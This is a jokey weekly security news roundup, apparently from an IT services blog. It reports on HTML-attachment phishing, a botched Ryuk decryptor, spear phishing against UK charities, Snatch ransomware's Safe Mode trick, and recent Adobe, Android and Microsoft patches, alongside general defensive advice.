Welcome back to Threat Thursday!
With Christmas getting even closer, it’s safe to say fraudulent emails, elaborate phishing campaigns and a glut of new Ransomware aren’t on the top of your Christmas list. Yet that’s exactly what this season’s Cyber-Scrooges are serving up, as expected. Let’s jump right on in, shall we?
Hackers Cut Out the Middleman
Hackers, seemingly getting ruddy livid with our attempts to avoid their attacks, have started putting phishing websites directly into the body of their emails. This trick was first revealed by Mimecast in July, and is seeing much more widespread use as the Christmas season draws nearer.
To avoid URL reputation checks, hackers are bundling html attachments into their phishing emails; this opens the malicious website on the user’s device, rather than on the global internet, making them harder to sniff out and less likely to be identified under the watchful eye of web users everywhere.
We’ll hand it to these industrious interlopers; this is a crafty scheme. It keeps malicious websites slightly more concealed from the public internet, and cuts out the need for separate phishing emails and links to compromised URLs. Yet that doesn’t make it any more protected against the typical phishing awareness procedures: check the sender’s address, don’t respond to any emails you aren’t expecting, and don’t open any attachments that you can’t identify.
Oh Look, Another Ryuk Development
Much like the Hellraiser franchise, this whole Ryuk debacle keeps receiving sequels that nobody asked for. Yet this latest development is such a fantastic posterchild for not paying Ransomware demands that we’re almost grateful it exists.
Why? Well it appears that the developers of Ryuk have, with their latest release, bungled the Ryuk decryptor. That means anyone who’s suffered from a Ryuk infection and pays the creators the ransom is very, very unlikely to get their files back unscathed.
That’s bad news for victims, sure. But it’s also bad news for Ryuk’s developers. Once word gets out that their decryptor is botched, victims will likely elect to just suffer the consequences, or seek professional assistance – either of which is a better option than throwing money away and being stuck with a compromised system.
We’ve always insisted that any Ransomware victims should never pay the fine, and this latest blunder from Ryuk is a stellar example as to why. Ryuk might be the real Grinch this Christmas, but it truly has given us the greatest gift of all: foresight. God bless us, everyone.
UK Government Warns Charities of Penny-Pinching Fraudsters
The UK government has issued a warning to charities following a spate of fraudulent emails. The emails, posing as members of staff, specifically target HR, finance or other relevant departments. They then go on to convince the recipient to change the bank details of the person the email is impersonating.
The emails are thought to be the product of some previous social engineering, as they convincingly mimic staff members and even have similar email addresses.
This method of ‘spear phishing’ is more intricate than the average phishing campaign, as it uses existing contact details to target specific people and companies. That’s why this alert is not one to be taken lightly. The government has urged all UK charities to review their internal procedures, avoid opening any unexpected emails, and compare any such emails against any known email addresses on record. We, naturally, would concur.
‘Snatch’ Ransomware Returns with an All-New Method of Attack
As if one Ransomware threat wasn’t enough, another by the name of ‘Snatch’ has returned with a cunning new way to compromise devices.
In an expose by Sophos, it’s been revealed that the latest version of Snatch forces a Windows device to reboot in Safe Mode, whereby the encryption progress begins. It’s thought that Safe Mode, which runs without endpoint protection, gives Snatch ample opportunity to spread unwatched through a victim’s machine. Not quite as ‘Safe’ as the mode would suggest, then.
Snatch was first discovered in the Summer of 2018, but Sophos draws attention to this particular new strain because of its use of Safe Mode. As a diagnostic environment, it’s the last thing you want compromised in the event of rogue software, and Snatch’s latest trick is an especially cruel way to spread its campaign. Keep an eye out for any emails with unknown .exe files; it’s the most common way for Malware to spread and, until more is known about the latest attacks, the most likely culprit for any successful infections.
It’s not all bad news in the world of Cyber Security however, as several vulnerabilities have been fixed in the latest software updates:
It Adobe Done: Numerous Critical Flaws Patched in Latest Adobe Update
There’s been no less than 25 updates to common Adobe products in the developer’s latest update, which sees Acrobat Reader, ColdFusion 2018, Photoshop and more receiving some critical patches. Multiple remote code execution vulnerabilities have now been squashed, while Adobe assures us that there were no known instances of any being exploited before the patch.
If you don’t fancy being the first known victim, we’d recommended updating any and all Adobe products on your network systems, naturally.
New Patch Deployed to Avoid Void Androids
Last week, Google released a patch for three critical Android vulnerabilities, including one catastrophic denial of service exploit that could see devices irreparably compromised.
The latest Android bulletin goes intro greater detail – but all you really need to know is that the update is live right now, and you’ll want it on any and all Android devices within your company.
Microsoft’s Patch Tuesday Fixes Zero Day Vulnerabilities, Makes For Dull Reading
Microsoft, much like us, addresses all its security concerns on a weekly basis, so it stands to reason that they can’t all make for explosive reading (or an endless supply of humorous headlines, much to our chagrin). Therefore, Microsoft’s most pressing patch will be presented, this week, in limerick form:
An exploit in Win32k
Could see hackers making their way
Into sensitive data
(which they’ll compromise later)
So make sure to upgrade, okay?
It appears there’s a vulnerability in the Win32k kernel that could see a hacker run ‘arbitrary code in kernel mode’, whereby the attacker could access, amend or delete a user’s data, as well as create new users with escalated access rights. This is fixed in the latest Windows update, and so too are a few critical flaws in Skype for Business, Microsoft Office and Internet Explorer You can view them all in the release notes here.
And that’s another Threat Thursday wrapped up for this week. With Christmas on the way, we urge all businesses, individuals and charities to be especially aware of phishing attacks and fraudulent websites – they’re going to be in abundance this time of year.